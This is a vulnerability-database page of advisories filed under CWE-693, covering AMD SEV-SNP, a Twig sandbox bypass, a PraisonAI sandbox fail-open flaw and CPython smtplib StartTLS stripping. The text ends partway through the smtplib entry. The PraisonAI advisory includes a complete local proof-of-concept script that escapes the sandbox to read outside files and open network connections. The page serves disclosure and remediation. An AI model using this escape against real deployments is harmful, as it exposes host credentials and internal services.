CWE-693
DiscouragedProtection Mechanism Failure
Abstraction: Pillar · Status: Draft
The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.
979 vulnerabilities reference this CWE, most recent first.
GHSA-6HRC-Q74X-C8G8
Vulnerability from github – Published: 2024-01-11 15:30 – Updated: 2025-06-20 21:31A privileged attacker can prevent delivery of debug exceptions to SEV-SNP guests potentially resulting in guests not receiving expected debug information.
{
"affected": [],
"aliases": [
"CVE-2023-20573"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-11T14:15:43Z",
"severity": "LOW"
},
"details": "A privileged attacker\ncan prevent delivery of debug exceptions to SEV-SNP guests potentially\nresulting in guests not receiving expected debug information.",
"id": "GHSA-6hrc-q74x-c8g8",
"modified": "2025-06-20T21:31:36Z",
"published": "2024-01-11T15:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20573"
},
{
"type": "WEB",
"url": "https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-3006"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6J75-5WFJ-GH66
Vulnerability from github – Published: 2024-09-09 20:19 – Updated: 2024-10-10 14:50Description
Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.
The security issue happens when all these conditions are met:
- The sandbox is disabled globally;
- The sandbox is enabled via a sandboxed
include()function which references a template name (likeincluded.twig) and not aTemplateorTemplateWrapperinstance; - The included template has been loaded before the
include()call but in a non-sandbox context (possible as the sandbox has been globally disabled).
Resolution
The patch ensures that the sandbox security checks are always run at runtime.
Credits
We would like to thank Fabien Potencier for reporting and fixing the issue.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "twig/twig"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.44.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "twig/twig"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.16.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "twig/twig"
},
"ranges": [
{
"events": [
{
"introduced": "3.12.0"
},
{
"fixed": "3.14.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "twig/twig"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.11.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45411"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2024-09-09T20:19:26Z",
"nvd_published_at": "2024-09-09T19:15:13Z",
"severity": "MODERATE"
},
"details": "### Description\n\nUnder some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.\n\nThe security issue happens when all these conditions are met:\n\n * The sandbox is disabled globally;\n * The sandbox is enabled via a sandboxed `include()` function which references a template name (like `included.twig`) and not a `Template` or `TemplateWrapper` instance;\n * The included template has been loaded before the `include()` call but in a non-sandbox context (possible as the sandbox has been globally disabled).\n\n### Resolution\n\nThe patch ensures that the sandbox security checks are always run at runtime.\n\n### Credits\n\nWe would like to thank Fabien Potencier for reporting and fixing the issue.\n",
"id": "GHSA-6j75-5wfj-gh66",
"modified": "2024-10-10T14:50:22Z",
"published": "2024-09-09T20:19:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45411"
},
{
"type": "WEB",
"url": "https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6"
},
{
"type": "WEB",
"url": "https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de"
},
{
"type": "WEB",
"url": "https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635"
},
{
"type": "WEB",
"url": "https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/twig/twig/CVE-2024-45411.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/twigphp/Twig"
},
{
"type": "WEB",
"url": "https://symfony.com/blog/twig-security-release-possible-sandbox-bypass"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Twig has a possible sandbox bypass"
}
GHSA-6JCQ-6546-QRRW
Vulnerability from github – Published: 2026-06-18 14:27 – Updated: 2026-06-18 14:27Summary
praisonai.sandbox.SandlockSandbox is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its SandboxConfig.native() path lets callers configure allowed filesystem paths and network=False.
On systems where the optional sandlock module imports but reports that Landlock is unavailable, SandlockSandbox.execute() and run_command() do not fail closed. They silently fall back to SubprocessSandbox(self.config).
That fallback keeps the same high-level native policy object but does not enforce the native filesystem or network boundary during code execution. A sandboxed payload can read files outside the configured allowed path and open network connections despite network=False.
Technical Details
SandboxConfig.native() creates a restricted native policy and records caller-provided writable paths plus the requested network posture:
return cls(
sandbox_type="native",
working_dir=os.getcwd(),
security_policy=SecurityPolicy(
allow_network=network,
allow_file_write=True,
allow_subprocess=True,
allowed_paths=resolved_paths,
),
metadata={"writable_paths": resolved_paths, "network": network},
)
SandlockSandbox builds the intended kernel policy with Landlock-backed filesystem allowlisting and network denial:
policy = Policy(
fs_readable=allowed_read_paths,
fs_writable=allowed_write_paths,
net_allow_hosts=[] if not limits.network_enabled else None,
max_memory=f"{limits.memory_mb}M",
max_processes=limits.max_processes,
max_open_files=limits.max_open_files,
)
However, both execution paths fail open when Sandlock is unavailable:
if not self.is_available:
logger.warning("Sandlock not available, falling back to subprocess")
from .subprocess import SubprocessSandbox
fallback = SubprocessSandbox(self.config)
return await fallback.execute(code, language, limits, env, working_dir)
SubprocessSandbox.execute() writes the code to a temp file and runs python with a minimal environment and POSIX rlimits. It does not install a filesystem sandbox, network namespace, syscall filter, chroot, Landlock policy, or path allowlist for the code execution path. The safe_sandbox_path() checks only protect the read_file(), write_file(), and list_files() helper methods.
Why This Is Not Intended Behavior
The report is not based only on a trust-model disagreement. The code and docs define a concrete boundary:
- PraisonAI's Sandlock README says the backend provides kernel-level filesystem allowlisting, network isolation, seccomp filtering, and blocks
/etc/passwd, SSH keys, AWS credentials, and unauthorized connections. - The security demo creates
SandboxConfig.native(writable_paths=["./safe_workspace"], network=False)and labels file and network access as blocked operations. - The upstream
sandlockpackage requires Linux with a compatible Landlock ABI and documents a fail-closed default for missing required protections unless the caller explicitly opts into degraded protection. - PraisonAI's own current security page recommends sandboxed execution and says path traversal protection is enabled by default for local sandbox backends.
The bug is the silent fallback from an unavailable kernel-enforced boundary to plain subprocess execution without preserving the configured native policy.
PoV
Run from a PraisonAI source checkout:
python3 poc/pov_poc.py \
--repo /path/to/PraisonAI
The PoV:
- injects a fake
sandlockmodule that imports successfully but reports no usable Landlock support; - configures
SandboxConfig.native(writable_paths=[tenant_a], network=False); - creates
tenant-b-secret.txtoutside the configured path; - starts a localhost TCP listener;
- executes code through
SandlockSandbox.execute().
Observed result on v4.6.58:
{
"child_output": {
"network_reply": "local-ok",
"outside_read": "TENANT_B_CANARY"
},
"configured_network": false,
"outside_path_under_allowed": false,
"sandlock_available": false,
"sandbox_type": "sandlock",
"status": "COMPLETED",
"vulnerable": true
}
This proves both policy boundaries are crossed:
- the file read target is not under the configured allowed path;
- the localhost network connection succeeds even though the native policy was created with
network=False.
Full PoV script:
#!/usr/bin/env python3
"""Local-only PoV for poc.
The PoV simulates a system where the optional ``sandlock`` Python package is
installed but kernel Landlock support is unavailable. That is the exact branch
handled by ``SandlockSandbox.execute()``: it logs a warning and falls back to
``SubprocessSandbox``.
No external network is used. The network control is a localhost TCP listener.
No sensitive host files are read. The filesystem control uses temporary tenant
directories and a canary file outside the configured writable path.
"""
from __future__ import annotations
import argparse
import asyncio
import contextlib
import json
import os
import pathlib
import socket
import sys
import tempfile
import types
from typing import Any
def _repo_paths(repo: pathlib.Path) -> list[str]:
return [
str(repo / "src" / "praisonai"),
str(repo / "src" / "praisonai-agents"),
]
async def _accept_once(server: socket.socket) -> str | None:
loop = asyncio.get_running_loop()
def accept() -> str:
conn, _ = server.accept()
with conn:
data = conn.recv(128)
conn.sendall(b"local-ok")
return data.decode("utf-8", "replace")
with contextlib.suppress(Exception):
return await loop.run_in_executor(None, accept)
return None
async def run_pov(repo: pathlib.Path) -> dict[str, Any]:
sandlock_path = repo / "src" / "praisonai" / "praisonai" / "sandbox" / "sandlock.py"
if not sandlock_path.exists():
return {"repo": str(repo), "has_sandlock": False, "vulnerable": False}
sys.path[:0] = _repo_paths(repo)
# Support both the original v4.5.110 API check and the current v4.6.58 API
# check while forcing the "Sandlock not available" branch.
sys.modules["sandlock"] = types.SimpleNamespace(
is_available=lambda: False,
landlock_abi_version=lambda: 0,
)
from praisonai.sandbox.sandlock import SandlockSandbox
from praisonaiagents.sandbox import ResourceLimits, SandboxConfig
with tempfile.TemporaryDirectory(prefix="poc-") as temp_root:
base = pathlib.Path(temp_root)
# Make the PoV deterministic on systems where "python" is not on PATH.
bindir = base / "bin"
bindir.mkdir()
(bindir / "python").symlink_to(sys.executable)
allowed = base / "tenant-a"
allowed.mkdir()
outside = base / "tenant-b-secret.txt"
outside.write_text("TENANT_B_CANARY", encoding="utf-8")
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))
server.listen(1)
server.settimeout(5)
port = server.getsockname()[1]
config = SandboxConfig.native(writable_paths=[str(allowed)], network=False)
sandbox = SandlockSandbox(config=config)
await sandbox.start()
code = f"""
import json
import socket
result = {{}}
try:
with open({str(outside)!r}, "r") as f:
result["outside_read"] = f.read()
except Exception as exc:
result["outside_read_error"] = type(exc).__name__ + ": " + str(exc)
try:
s = socket.create_connection(("127.0.0.1", {port}), timeout=3)
s.sendall(b"hello")
result["network_reply"] = s.recv(32).decode("utf-8", "replace")
s.close()
except Exception as exc:
result["network_error"] = type(exc).__name__ + ": " + str(exc)
print(json.dumps(result, sort_keys=True))
"""
accept_task = asyncio.create_task(_accept_once(server))
result = await sandbox.execute(
code,
limits=ResourceLimits(
timeout_seconds=10,
memory_mb=512,
max_processes=10,
max_open_files=64,
network_enabled=False,
),
env={"PATH": str(bindir)},
)
accepted_payload = None
with contextlib.suppress(Exception):
accepted_payload = await accept_task
server.close()
await sandbox.stop()
child_output: dict[str, Any] = {}
with contextlib.suppress(Exception):
child_output = json.loads(result.stdout.strip())
vulnerable = (
child_output.get("outside_read") == "TENANT_B_CANARY"
and child_output.get("network_reply") == "local-ok"
)
return {
"repo": str(repo),
"has_sandlock": True,
"sandbox_type": sandbox.sandbox_type,
"sandlock_available": sandbox.is_available,
"configured_allowed_paths": config.security_policy.allowed_paths,
"configured_network": config.security_policy.allow_network,
"outside_path_under_allowed": str(outside).startswith(str(allowed) + os.sep),
"status": getattr(result.status, "name", str(result.status)),
"exit_code": result.exit_code,
"stdout": result.stdout.strip(),
"stderr": result.stderr.strip(),
"error": result.error,
"child_output": child_output,
"accepted_local_payload": accepted_payload,
"vulnerable": vulnerable,
}
def main() -> int:
parser = argparse.ArgumentParser()
parser.add_argument("--repo", required=True, type=pathlib.Path)
args = parser.parse_args()
result = asyncio.run(run_pov(args.repo.resolve()))
print(json.dumps(result, indent=2, sort_keys=True))
if result.get("has_sandlock") and not result.get("vulnerable"):
return 1
return 0
if __name__ == "__main__":
raise SystemExit(main())
PoC
The PoV section above contains the local reproduction command, input, and decisive output.
Impact
If a PraisonAI user or service relies on SandlockSandbox / native sandboxing for untrusted code isolation on a host without the required Landlock support, code submitted to the sandbox can execute with the host user's normal filesystem and network access.
Concrete impact includes:
- reading files outside the configured tenant/workspace path;
- reading project files, credentials,
.envfiles, SSH material, or cloud config reachable by the PraisonAI process user; - connecting to loopback or internal services despite
network=False; - moving from sandboxed code execution to unsandboxed host-user code execution in deployments that treat Sandlock as the isolation boundary.
The local PoV does not read real sensitive files or contact external systems. It uses temporary tenant directories and a localhost TCP listener.
Suggested Fix
Fail closed when the requested native sandbox boundary cannot be enforced.
Recommended changes:
- In
SandlockSandbox.execute()andrun_command(), return a failedSandboxResultor raise a clear runtime error whenself.is_availableis false. - If fallback behavior is kept for developer convenience, require an explicit opt-in such as
allow_degraded=Trueorfallback="subprocess"and surface that degraded state in the result metadata. - Do not preserve
sandbox_type == "sandlock"in status metadata when the actual execution backend is subprocess. - Add regression tests proving that unavailable Landlock does not execute code unless degraded fallback was explicitly requested.
- Add tests that a native policy with
network=Falseand a restricted path cannot read outside-path canaries or connect to a localhost listener. - Document the required kernel/ABI versions and the exact degraded-mode semantics.
Affected Package/Versions
- Repository:
MervinPraison/PraisonAI - Package:
praisonai - Component:
src/praisonai/praisonai/sandbox/sandlock.py - Related config component:
src/praisonai-agents/praisonaiagents/sandbox/config.py - Latest verified release/current head:
v4.6.58,1ad58ca02975ff1398efeda694ea2ab78f20cf3e
Confirmed affected:
v4.5.110 vulnerable
v4.5.120 vulnerable
v4.6.58 vulnerable
current vulnerable
Negative control:
v4.5.109 not affected because SandlockSandbox is absent
Suggested affected range: >= 4.5.110, <= 4.6.58.
No fixed version is known at submission time.
Version Sweep
version has_sandlock sandlock_available status outside_read network_reply vulnerable
praisonai-v4.5.109 false false
praisonai-v4.5.110 true false COMPLETED TENANT_B_CANARY local-ok true
praisonai-v4.6.58 true false COMPLETED TENANT_B_CANARY local-ok true
praisonai-current true false COMPLETED TENANT_B_CANARY local-ok true
GitHub history for sandlock.py shows the backend was introduced in 4ee7d298c89f on 2026-04-01 with "graceful fallback to SubprocessSandbox", then updated in 7ae6c6d19c31 on 2026-04-02 to use the current Landlock ABI check.
Advisory History
Nearby advisories are distinct:
GHSA-r4f2-3m54-pp7q/CVE-2026-34955:SubprocessSandboxshell command escape through4.5.96.GHSA-4mr5-g6f9-cfrh,GHSA-qf73-2hrx-xprp,GHSA-6vh2-h83c-9294:execute_code()Python sandbox escapes.GHSA-ch89-h4r2-c8f8: agent tools workspace escape via symlinks.GHSA-gcq3-mfvh-3x25: PraisonAI Code agent tool workspace fail-open.
This report covers a different root cause: SandlockSandbox / native sandbox policy downgrade when Landlock is unavailable. It reproduces on the latest release v4.6.58, while the older SubprocessSandbox shell escape advisory was fixed at 4.5.97.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "4.5.110"
},
{
"fixed": "4.6.61"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-668",
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:27:19Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\n`praisonai.sandbox.SandlockSandbox` is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its `SandboxConfig.native()` path lets callers configure allowed filesystem paths and `network=False`.\n\nOn systems where the optional `sandlock` module imports but reports that Landlock is unavailable, `SandlockSandbox.execute()` and `run_command()` do not fail closed. They silently fall back to `SubprocessSandbox(self.config)`.\n\nThat fallback keeps the same high-level native policy object but does not enforce the native filesystem or network boundary during code execution. A sandboxed payload can read files outside the configured allowed path and open network connections despite `network=False`.\n\n## Technical Details\n\n`SandboxConfig.native()` creates a restricted native policy and records caller-provided writable paths plus the requested network posture:\n\n```python\nreturn cls(\n sandbox_type=\"native\",\n working_dir=os.getcwd(),\n security_policy=SecurityPolicy(\n allow_network=network,\n allow_file_write=True,\n allow_subprocess=True,\n allowed_paths=resolved_paths,\n ),\n metadata={\"writable_paths\": resolved_paths, \"network\": network},\n)\n```\n\n`SandlockSandbox` builds the intended kernel policy with Landlock-backed filesystem allowlisting and network denial:\n\n```python\npolicy = Policy(\n fs_readable=allowed_read_paths,\n fs_writable=allowed_write_paths,\n net_allow_hosts=[] if not limits.network_enabled else None,\n max_memory=f\"{limits.memory_mb}M\",\n max_processes=limits.max_processes,\n max_open_files=limits.max_open_files,\n)\n```\n\nHowever, both execution paths fail open when Sandlock is unavailable:\n\n```python\nif not self.is_available:\n logger.warning(\"Sandlock not available, falling back to subprocess\")\n from .subprocess import SubprocessSandbox\n fallback = SubprocessSandbox(self.config)\n return await fallback.execute(code, language, limits, env, working_dir)\n```\n\n`SubprocessSandbox.execute()` writes the code to a temp file and runs `python` with a minimal environment and POSIX rlimits. It does not install a filesystem sandbox, network namespace, syscall filter, chroot, Landlock policy, or path allowlist for the code execution path. The `safe_sandbox_path()` checks only protect the `read_file()`, `write_file()`, and `list_files()` helper methods.\n\n### Why This Is Not Intended Behavior\n\nThe report is not based only on a trust-model disagreement. The code and docs define a concrete boundary:\n\n- PraisonAI\u0027s Sandlock README says the backend provides kernel-level filesystem allowlisting, network isolation, seccomp filtering, and blocks `/etc/passwd`, SSH keys, AWS credentials, and unauthorized connections.\n- The security demo creates `SandboxConfig.native(writable_paths=[\"./safe_workspace\"], network=False)` and labels file and network access as blocked operations.\n- The upstream `sandlock` package requires Linux with a compatible Landlock ABI and documents a fail-closed default for missing required protections unless the caller explicitly opts into degraded protection.\n- PraisonAI\u0027s own current security page recommends sandboxed execution and says path traversal protection is enabled by default for local sandbox backends.\n\nThe bug is the silent fallback from an unavailable kernel-enforced boundary to plain subprocess execution without preserving the configured native policy.\n\n## PoV\n\nRun from a PraisonAI source checkout:\n\n```bash\npython3 poc/pov_poc.py \\\n --repo /path/to/PraisonAI\n```\n\nThe PoV:\n\n1. injects a fake `sandlock` module that imports successfully but reports no usable Landlock support;\n2. configures `SandboxConfig.native(writable_paths=[tenant_a], network=False)`;\n3. creates `tenant-b-secret.txt` outside the configured path;\n4. starts a localhost TCP listener;\n5. executes code through `SandlockSandbox.execute()`.\n\nObserved result on `v4.6.58`:\n\n```json\n{\n \"child_output\": {\n \"network_reply\": \"local-ok\",\n \"outside_read\": \"TENANT_B_CANARY\"\n },\n \"configured_network\": false,\n \"outside_path_under_allowed\": false,\n \"sandlock_available\": false,\n \"sandbox_type\": \"sandlock\",\n \"status\": \"COMPLETED\",\n \"vulnerable\": true\n}\n```\n\nThis proves both policy boundaries are crossed:\n\n- the file read target is not under the configured allowed path;\n- the localhost network connection succeeds even though the native policy was created with `network=False`.\n\nFull PoV script:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Local-only PoV for poc.\n\nThe PoV simulates a system where the optional ``sandlock`` Python package is\ninstalled but kernel Landlock support is unavailable. That is the exact branch\nhandled by ``SandlockSandbox.execute()``: it logs a warning and falls back to\n``SubprocessSandbox``.\n\nNo external network is used. The network control is a localhost TCP listener.\nNo sensitive host files are read. The filesystem control uses temporary tenant\ndirectories and a canary file outside the configured writable path.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\nimport asyncio\nimport contextlib\nimport json\nimport os\nimport pathlib\nimport socket\nimport sys\nimport tempfile\nimport types\nfrom typing import Any\n\ndef _repo_paths(repo: pathlib.Path) -\u003e list[str]:\n return [\n str(repo / \"src\" / \"praisonai\"),\n str(repo / \"src\" / \"praisonai-agents\"),\n ]\n\nasync def _accept_once(server: socket.socket) -\u003e str | None:\n loop = asyncio.get_running_loop()\n\n def accept() -\u003e str:\n conn, _ = server.accept()\n with conn:\n data = conn.recv(128)\n conn.sendall(b\"local-ok\")\n return data.decode(\"utf-8\", \"replace\")\n\n with contextlib.suppress(Exception):\n return await loop.run_in_executor(None, accept)\n return None\n\nasync def run_pov(repo: pathlib.Path) -\u003e dict[str, Any]:\n sandlock_path = repo / \"src\" / \"praisonai\" / \"praisonai\" / \"sandbox\" / \"sandlock.py\"\n if not sandlock_path.exists():\n return {\"repo\": str(repo), \"has_sandlock\": False, \"vulnerable\": False}\n\n sys.path[:0] = _repo_paths(repo)\n\n # Support both the original v4.5.110 API check and the current v4.6.58 API\n # check while forcing the \"Sandlock not available\" branch.\n sys.modules[\"sandlock\"] = types.SimpleNamespace(\n is_available=lambda: False,\n landlock_abi_version=lambda: 0,\n )\n\n from praisonai.sandbox.sandlock import SandlockSandbox\n from praisonaiagents.sandbox import ResourceLimits, SandboxConfig\n\n with tempfile.TemporaryDirectory(prefix=\"poc-\") as temp_root:\n base = pathlib.Path(temp_root)\n\n # Make the PoV deterministic on systems where \"python\" is not on PATH.\n bindir = base / \"bin\"\n bindir.mkdir()\n (bindir / \"python\").symlink_to(sys.executable)\n\n allowed = base / \"tenant-a\"\n allowed.mkdir()\n outside = base / \"tenant-b-secret.txt\"\n outside.write_text(\"TENANT_B_CANARY\", encoding=\"utf-8\")\n\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((\"127.0.0.1\", 0))\n server.listen(1)\n server.settimeout(5)\n port = server.getsockname()[1]\n\n config = SandboxConfig.native(writable_paths=[str(allowed)], network=False)\n sandbox = SandlockSandbox(config=config)\n await sandbox.start()\n\n code = f\"\"\"\nimport json\nimport socket\n\nresult = {{}}\n\ntry:\n with open({str(outside)!r}, \"r\") as f:\n result[\"outside_read\"] = f.read()\nexcept Exception as exc:\n result[\"outside_read_error\"] = type(exc).__name__ + \": \" + str(exc)\n\ntry:\n s = socket.create_connection((\"127.0.0.1\", {port}), timeout=3)\n s.sendall(b\"hello\")\n result[\"network_reply\"] = s.recv(32).decode(\"utf-8\", \"replace\")\n s.close()\nexcept Exception as exc:\n result[\"network_error\"] = type(exc).__name__ + \": \" + str(exc)\n\nprint(json.dumps(result, sort_keys=True))\n\"\"\"\n\n accept_task = asyncio.create_task(_accept_once(server))\n result = await sandbox.execute(\n code,\n limits=ResourceLimits(\n timeout_seconds=10,\n memory_mb=512,\n max_processes=10,\n max_open_files=64,\n network_enabled=False,\n ),\n env={\"PATH\": str(bindir)},\n )\n\n accepted_payload = None\n with contextlib.suppress(Exception):\n accepted_payload = await accept_task\n\n server.close()\n await sandbox.stop()\n\n child_output: dict[str, Any] = {}\n with contextlib.suppress(Exception):\n child_output = json.loads(result.stdout.strip())\n\n vulnerable = (\n child_output.get(\"outside_read\") == \"TENANT_B_CANARY\"\n and child_output.get(\"network_reply\") == \"local-ok\"\n )\n\n return {\n \"repo\": str(repo),\n \"has_sandlock\": True,\n \"sandbox_type\": sandbox.sandbox_type,\n \"sandlock_available\": sandbox.is_available,\n \"configured_allowed_paths\": config.security_policy.allowed_paths,\n \"configured_network\": config.security_policy.allow_network,\n \"outside_path_under_allowed\": str(outside).startswith(str(allowed) + os.sep),\n \"status\": getattr(result.status, \"name\", str(result.status)),\n \"exit_code\": result.exit_code,\n \"stdout\": result.stdout.strip(),\n \"stderr\": result.stderr.strip(),\n \"error\": result.error,\n \"child_output\": child_output,\n \"accepted_local_payload\": accepted_payload,\n \"vulnerable\": vulnerable,\n }\n\ndef main() -\u003e int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--repo\", required=True, type=pathlib.Path)\n args = parser.parse_args()\n\n result = asyncio.run(run_pov(args.repo.resolve()))\n print(json.dumps(result, indent=2, sort_keys=True))\n\n if result.get(\"has_sandlock\") and not result.get(\"vulnerable\"):\n return 1\n return 0\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n```\n\n## PoC\n\nThe PoV section above contains the local reproduction command, input, and decisive output.\n\n## Impact\n\nIf a PraisonAI user or service relies on `SandlockSandbox` / native sandboxing for untrusted code isolation on a host without the required Landlock support, code submitted to the sandbox can execute with the host user\u0027s normal filesystem and network access.\n\nConcrete impact includes:\n\n- reading files outside the configured tenant/workspace path;\n- reading project files, credentials, `.env` files, SSH material, or cloud config reachable by the PraisonAI process user;\n- connecting to loopback or internal services despite `network=False`;\n- moving from sandboxed code execution to unsandboxed host-user code execution in deployments that treat Sandlock as the isolation boundary.\n\nThe local PoV does not read real sensitive files or contact external systems. It uses temporary tenant directories and a localhost TCP listener.\n\n## Suggested Fix\n\nFail closed when the requested native sandbox boundary cannot be enforced.\n\nRecommended changes:\n\n1. In `SandlockSandbox.execute()` and `run_command()`, return a failed `SandboxResult` or raise a clear runtime error when `self.is_available` is false.\n2. If fallback behavior is kept for developer convenience, require an explicit opt-in such as `allow_degraded=True` or `fallback=\"subprocess\"` and surface that degraded state in the result metadata.\n3. Do not preserve `sandbox_type == \"sandlock\"` in status metadata when the actual execution backend is subprocess.\n4. Add regression tests proving that unavailable Landlock does not execute code unless degraded fallback was explicitly requested.\n5. Add tests that a native policy with `network=False` and a restricted path cannot read outside-path canaries or connect to a localhost listener.\n6. Document the required kernel/ABI versions and the exact degraded-mode semantics.\n\n## Affected Package/Versions\n\n- Repository: `MervinPraison/PraisonAI`\n- Package: `praisonai`\n- Component: `src/praisonai/praisonai/sandbox/sandlock.py`\n- Related config component: `src/praisonai-agents/praisonaiagents/sandbox/config.py`\n- Latest verified release/current head: `v4.6.58`, `1ad58ca02975ff1398efeda694ea2ab78f20cf3e`\n\nConfirmed affected:\n\n```text\nv4.5.110 vulnerable\nv4.5.120 vulnerable\nv4.6.58 vulnerable\ncurrent vulnerable\n```\n\nNegative control:\n\n```text\nv4.5.109 not affected because SandlockSandbox is absent\n```\n\nSuggested affected range: `\u003e= 4.5.110, \u003c= 4.6.58`.\n\nNo fixed version is known at submission time.\n\n### Version Sweep\n\n```text\nversion has_sandlock sandlock_available status outside_read network_reply vulnerable\npraisonai-v4.5.109 false false\npraisonai-v4.5.110 true false COMPLETED TENANT_B_CANARY local-ok true\npraisonai-v4.6.58 true false COMPLETED TENANT_B_CANARY local-ok true\npraisonai-current true false COMPLETED TENANT_B_CANARY local-ok true\n```\n\nGitHub history for `sandlock.py` shows the backend was introduced in `4ee7d298c89f` on 2026-04-01 with \"graceful fallback to SubprocessSandbox\", then updated in `7ae6c6d19c31` on 2026-04-02 to use the current Landlock ABI check.\n\n## Advisory History\n\nNearby advisories are distinct:\n\n- `GHSA-r4f2-3m54-pp7q` / `CVE-2026-34955`: `SubprocessSandbox` shell command escape through `4.5.96`.\n- `GHSA-4mr5-g6f9-cfrh`, `GHSA-qf73-2hrx-xprp`, `GHSA-6vh2-h83c-9294`: `execute_code()` Python sandbox escapes.\n- `GHSA-ch89-h4r2-c8f8`: agent tools workspace escape via symlinks.\n- `GHSA-gcq3-mfvh-3x25`: PraisonAI Code agent tool workspace fail-open.\n\nThis report covers a different root cause: `SandlockSandbox` / native sandbox policy downgrade when Landlock is unavailable. It reproduces on the latest release `v4.6.58`, while the older `SubprocessSandbox` shell escape advisory was fixed at `4.5.97`.",
"id": "GHSA-6jcq-6546-qrrw",
"modified": "2026-06-18T14:27:19Z",
"published": "2026-06-18T14:27:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6jcq-6546-qrrw"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI SandlockSandbox falls back to unrestricted subprocess execution when Landlock is unavailable"
}
GHSA-6M57-Q338-H677
Vulnerability from github – Published: 2022-05-14 01:35 – Updated: 2022-05-14 01:35The smtplib library in CPython (aka Python) before 2.7.12, 3.x before 3.4.5, and 3.5.x before 3.5.2 does not return an error when StartTLS fails, which might allow man-in-the-middle attackers to bypass the TLS protections by leveraging a network position between the client and the registry to block the StartTLS command, aka a "StartTLS stripping attack."
{
"affected": [],
"aliases": [
"CVE-2016-0772"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-09-02T14:59:00Z",
"severity": "MODERATE"
},
"details": "The smtplib library in CPython (aka Python) before 2.7.12, 3.x before 3.4.5, and 3.5.x before 3.5.2 does not return an error when StartTLS fails, which might allow man-in-the-middle attackers to bypass the TLS protections by leveraging a network position between the client and the registry to block the StartTLS command, aka a \"StartTLS stripping attack.\"",
"id": "GHSA-6m57-q338-h677",
"modified": "2022-05-14T01:35:22Z",
"published": "2022-05-14T01:35:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0772"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1303647"
},
{
"type": "WEB",
"url": "https://docs.python.org/3.4/whatsnew/changelog.html#python-3-4-5"
},
{
"type": "WEB",
"url": "https://docs.python.org/3.5/whatsnew/changelog.html#python-3-5-2"
},
{
"type": "WEB",
"url": "https://hg.python.org/cpython/raw-file/v2.7.12/Misc/NEWS"
},
{
"type": "WEB",
"url": "https://hg.python.org/cpython/rev/b3ce713fb9be"
},
{
"type": "WEB",
"url": "https://hg.python.org/cpython/rev/d590114c2394"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00011.html"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201701-18"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html"
},
{
